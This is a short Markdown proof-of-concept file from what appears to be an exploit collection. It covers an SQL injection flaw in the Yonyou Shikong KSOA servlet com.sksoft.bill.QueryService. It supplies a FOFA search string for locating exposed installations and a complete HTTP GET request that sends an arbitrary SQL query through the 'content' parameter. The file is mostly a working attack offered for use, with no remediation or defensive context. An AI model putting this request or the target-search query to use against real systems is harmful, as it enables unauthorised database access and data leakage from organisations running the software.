POC/wpoc/用友OA/用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

21 lines
665 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞
用友时空KSOA /servlet/com.sksoft.bill.QueryService 存在sql注入漏洞导致数据泄露。
## fofa
```yaml
app="用友-时空KSOA"
```
## poc
```yaml
GET /servlet/com.sksoft.bill.QueryService?service=query&content=SELECT%20HashBytes('md5','NjTFtj4Q'); HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: close
```
![image-20240709134924259](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407091349312.png)